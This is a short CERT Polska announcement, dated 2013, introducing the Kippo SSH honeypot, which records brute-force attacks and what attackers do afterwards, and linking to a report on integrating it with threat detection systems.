In-depth look at Kippo: an integration perspective

Date of publication: 08/04/2013, CERT Polska

Kippo SSH honeypot

Brute-force (dictionary) attacks on Secure Shell (SSH) services remain popular on the Internet. Although hardly a sophisticated type of attack, it is relatively effective, and one of the most common intrusion vectors for UNIX servers.

Kippo is a low-interaction honeypot emulating the SSH service. The honeypot can be used to register brute force attacks aimed at obtaining users SSH service passwords. Moreover, it allows for analyzing further actions of the attacker who manages to obtain the password and thus has access to the emulated system. This is possible because Kippo registers all shell commands inputted by the user and saves all downloaded files. In the ENISA study “Proactive Detection of Security Incidents: Honeypots” Kippo was recognized as one of the most useful honeypots for incident response teams and was recommended for easy deployment.

In addition to the Kippo studies carried out in the above report by CERT Polska, Kippo has been tested in-depth by researchers from the Network and Information Security Methods Team, NASK, during the development of a larger network attack detection system. The aim was to analyze the honeypot from the perspective of integration with other threat detection systems – including automation of its (re)configuration, use, etc. The results of these studies are available in a short report (PDF). We hope that it will also be helpful for those who have not yet used Kippo, but would like to deploy it.

Download the report from here (PDF, 25 pages, 234 KB).